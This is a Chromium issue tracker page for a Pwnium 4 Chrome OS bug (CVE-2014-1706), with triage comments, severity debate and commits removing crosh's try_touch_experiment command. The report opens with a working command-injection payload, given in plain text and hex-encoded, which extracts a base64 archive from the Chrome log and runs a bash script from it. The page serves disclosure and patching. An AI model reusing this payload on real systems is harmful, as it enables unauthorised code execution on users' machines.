New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.

Issue 351796 link

Starred by 2 users

Issue metadata

Status: Verified
Owner:
Closed: Mar 2014
Cc:
EstimatedDays: ----
NextAction: ----
OS: Chrome
Pri: 2
Type: Bug-Security

Blocking:
issue 351788



Sign in to add a comment

Security: Pwnium 4 GeoHot bug: try_touch_experiment command injection

Project Member Reported by jorgelo@chromium.org, Mar 12 2014

Issue description

mkdir -p /tmp/haxx ; grep -a -v "\[" /var/log/chrome/chrome | tail -n1 | base64 -d | tar zx -C /tmp/haxx ; /bin/bash /tmp/haxx/autoexec.sh 1>&2

"try_touch_experiment
61273b62617368202d6320276d6b646972202d70202f746d702f68617878203b2067726570202d61202d7620225c5b22202f7661722f6c6f672f6368726f6d652f6368726f6d65207c207461696c202d6e31207c20626173653634202d64207c20746172207a78202d43202f746d702f68617878203b202f62696e2f62617368202f746d702f686178782f6175746f657865632e736820313e2632273b6563686f20273a312e302c69\n"

 
Blocking: chromium:351788
Cc: adlr@chromium.org

Comment 3 by adlr@chromium.org, Mar 12 2014

Cc: jorgelo@chromium.org
Labels: ReleaseBlock-Dev M-33
Owner: adlr@chromium.org
Status: Started
We can safely remove this from the image for now.

Need to go as far back as R33. CLs are being prepared now.

Comment 4 by adlr@chromium.org, Mar 12 2014

Labels: Merge-Requested

Comment 5 by dharani@google.com, Mar 12 2014

Labels: -ReleaseBlock-Dev -Merge-Requested ReleaseBlock-Stable Merge-Approved

Comment 6 Deleted

Comment 8 by adlr@chromium.org, Mar 12 2014

personal ToT image looks good! try_touch_experiment is removed from the image.

I'll double check the bot images when they're ready and then submit the CLs.

Comment 9 by sumit@chromium.org, Mar 12 2014

Cc: skuhne@chromium.org
Labels: M-34
Status: Fixed
We still need to merge to m33 and m34.
Sweet! Thanks Andrew!

Comment 12 by adlr@chromium.org, Mar 12 2014

Status: Started
These CLs aren't in yet. I'm still waiting on bots, even for ToT.
Thanks! Please update when bots pass.
Project Member

Comment 16 by bugdroid1@chromium.org, Mar 12 2014

Project: chromiumos/overlays/chromiumos-overlay
Branch : master
Author : Andrew de los Reyes <adlr@chromium.org>
Commit : 56407aa2121f611ab5909b77cdbf6baad9183894

Code-Review  0 : Andrew de los Reyes
Code-Review  +2: Jorge Lucangeli Obes, Kees Cook
Commit-Queue 0 : Jorge Lucangeli Obes, Kees Cook
Commit-Queue +1: Andrew de los Reyes
Verified     0 : Jorge Lucangeli Obes, Kees Cook
Verified     +1: Andrew de los Reyes
Commit Queue   : Chumped
Change-Id      : I3cfd85ef85930548959e72c1e54ce693e8f0b573
Reviewed-at    : https://chromium-review.googlesource.com/189659

crosh/crosh: Remove dependency on salsa

BUG= chromium:351796 
TEST=manually tested buildbot image

chromeos-base/crosh/crosh-9999.ebuild
Project Member

Comment 17 by bugdroid1@chromium.org, Mar 12 2014

Project: chromiumos/platform/crosh
Branch : master
Author : Andrew de los Reyes <adlr@chromium.org>
Commit : fc53dcba3ef19b3be959a3dfe0608514f2eef88b

Code-Review  0 : Andrew de los Reyes
Code-Review  +2: Jorge Lucangeli Obes
Commit-Queue 0 : Jorge Lucangeli Obes
Commit-Queue +1: Andrew de los Reyes
Verified     0 : Jorge Lucangeli Obes
Verified     +1: Andrew de los Reyes
Commit Queue   : Chumped
Change-Id      : I05f97d83d407de5d516b10548441bb7d8376987d
Reviewed-at    : https://chromium-review.googlesource.com/189648

Remove try_touch_experiment.

BUG= chromium:351796 
TEST=tested buildbot image

crosh

Comment 18 by adlr@chromium.org, Mar 12 2014

Status: Fixed
changes submitted to ToT. Still verifying stabilize, R34, R33
Project Member

Comment 19 by bugdroid1@chromium.org, Mar 12 2014

Project: chromiumos/overlays/chromiumos-overlay
Branch : release-R34-5500.B
Author : Andrew de los Reyes <adlr@chromium.org>
Commit : 36528f922bc9d6431d5879162a515c0fc19f93c4

Code-Review  +2: Andrew de los Reyes
Commit-Queue +1: Andrew de los Reyes
Verified     +1: Andrew de los Reyes
Commit Queue   : Chumped
Change-Id      : I6e076a05451acb26cc756edf4f7f9348d1a9bb69
Reviewed-at    : https://chromium-review.googlesource.com/189673

crosh/crosh: Remove dependency on salsa

BUG= chromium:351796 
TEST=manually tested buildbot image

chromeos-base/crosh/crosh-9999.ebuild
Project Member

Comment 20 by bugdroid1@chromium.org, Mar 12 2014

Project: chromiumos/platform/crosh
Branch : release-R34-5500.B
Author : Andrew de los Reyes <adlr@chromium.org>
Commit : 6c247daea3dda481c150843f17de33c84ef155dc

Code-Review  +2: Andrew de los Reyes
Commit-Queue +1: Andrew de los Reyes
Verified     +1: Andrew de los Reyes
Commit Queue   : Chumped
Change-Id      : I0660280322e9d6c46e252ebdbc697a7e488cb7bd
Reviewed-at    : https://chromium-review.googlesource.com/189681

Remove try_touch_experiment.

BUG= chromium:351796 
TEST=tested buildbot image

crosh

Comment 21 by adlr@chromium.org, Mar 12 2014

ToT and R34 verified and submitted. Still testing R33, stabilize
Project Member

Comment 22 by bugdroid1@chromium.org, Mar 12 2014

Project: chromiumos/platform/crosh
Branch : release-R33-5116.B
Author : Andrew de los Reyes <adlr@chromium.org>
Commit : daad75e0f1de03ae1ffac6a0e7c741e14d329c80

Code-Review  +2: Andrew de los Reyes
Commit-Queue +1: Andrew de los Reyes
Verified     +1: Andrew de los Reyes
Commit Queue   : Chumped
Change-Id      : I72639ed661fc5ec829b69b7341b86cbab9edebdf
Reviewed-at    : https://chromium-review.googlesource.com/189691

Remove try_touch_experiment.

BUG= chromium:351796 
TEST=tested buildbot image

crosh
Project Member

Comment 23 by bugdroid1@chromium.org, Mar 12 2014

Project: chromiumos/overlays/chromiumos-overlay
Branch : release-R33-5116.B
Author : Andrew de los Reyes <adlr@chromium.org>
Commit : a27ffd049e3847ae161d892c9e1af45595ad495d

Code-Review  +2: Andrew de los Reyes
Commit-Queue +1: Andrew de los Reyes
Verified     +1: Andrew de los Reyes
Commit Queue   : Chumped
Change-Id      : Ifcc73c12f4f51a23cf54281c9c3a518a07fff1fe
Reviewed-at    : https://chromium-review.googlesource.com/189680

crosh/crosh: Remove dependency on salsa

BUG= chromium:351796 
TEST=manually tested buildbot image

chromeos-base/crosh/crosh-9999.ebuild

Comment 24 by adlr@chromium.org, Mar 12 2014

ToT, R34, R33 checked in. Still waiting on bot for stabilize
Project Member

Comment 25 by bugdroid1@chromium.org, Mar 12 2014

Project: chromiumos/overlays/chromiumos-overlay
Branch : stabilize-5116.115.B
Author : Andrew de los Reyes <adlr@chromium.org>
Commit : 28afc81289893c1185d7eda2f2a0059f14aba9c1

Code-Review  0 : Jorge Lucangeli Obes
Code-Review  +2: Andrew de los Reyes
Commit-Queue 0 : Jorge Lucangeli Obes
Commit-Queue +1: Andrew de los Reyes
Verified     0 : Jorge Lucangeli Obes
Verified     +1: Andrew de los Reyes
Commit Queue   : Chumped
Change-Id      : Id5c84c3d2f3f6257fe6f16d69b8fbc26ce6f9543
Reviewed-at    : https://chromium-review.googlesource.com/189687

crosh/crosh: Remove dependency on salsa

BUG= chromium:351796 
TEST=manually tested buildbot image

chromeos-base/crosh/crosh-9999.ebuild
Project Member

Comment 26 by bugdroid1@chromium.org, Mar 12 2014

Project: chromiumos/platform/crosh
Branch : stabilize-5116.115.B
Author : Andrew de los Reyes <adlr@chromium.org>
Commit : 85e403a6d56a745b0d89d6c7a0fc83c72c3616d2

Code-Review  0 : Jorge Lucangeli Obes
Code-Review  +2: Andrew de los Reyes
Commit-Queue 0 : Jorge Lucangeli Obes
Commit-Queue +1: Andrew de los Reyes
Verified     0 : Jorge Lucangeli Obes
Verified     +1: Andrew de los Reyes
Commit Queue   : Chumped
Change-Id      : I7fd54cea53811148372ecd65936b1e4ba8b85952
Reviewed-at    : https://chromium-review.googlesource.com/189677

Remove try_touch_experiment.

BUG= chromium:351796 
TEST=tested buildbot image

crosh

Comment 27 by adlr@chromium.org, Mar 12 2014

Labels: -Merge-Approved Merge-Merged
Fix is in ToT, R34, R33, stabilize-5116.115.B.

I think that's all for now!
Labels: Release-2-M33
Labels: -Release-2-M33 Release-3-M33
Cc: deepakg@chromium.org
Labels: CVE-2014-1706

Comment 32 by k...@google.com, Mar 14 2014

Cc: kamakshi@chromium.org
Labels: Security_Impact-Beta Security_Impact-Stable
Labels: Security_Severity-Critical
Sandbox escape.
Labels: -Security_Severity-Critical Security_Severity-High
High for sandbox escapes.
Labels: -Security_Severity-High Security_Severity-Low
The Schuh thinks this is low, because without the process confusion you would need to be running as the browser process to talk to crosh, at which point there's no real escalation.
Cc: mbevand@google.com
Cc: charliemooney@chromium.org
Project Member

Comment 39 by ClusterFuzz, Jun 18 2014

Labels: -Restrict-View-SecurityTeam
Bulk update: removing view restriction from closed bugs.

Comment 40 by krisr@chromium.org, Jun 24 2014

Status: Verified

Comment 41 Deleted

It's been fixed, you can't do it anymore
Project Member

Comment 43 by sheriffbot@chromium.org, Mar 22 2016

Labels: -security_impact-beta
Project Member

Comment 44 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 45 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 46 by sheriffbot@chromium.org, Oct 2 2016

Labels: Restrict-View-SecurityNotify
Labels: allpublic
Project Member

Comment 48 by sheriffbot@chromium.org, Oct 3 2016

Labels: -Restrict-View-SecurityNotify
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: CVE_description-submitted
Project Member

Comment 50 by sheriffbot@chromium.org, Jul 28

Labels: -Pri-0 Pri-2

Sign in to add a comment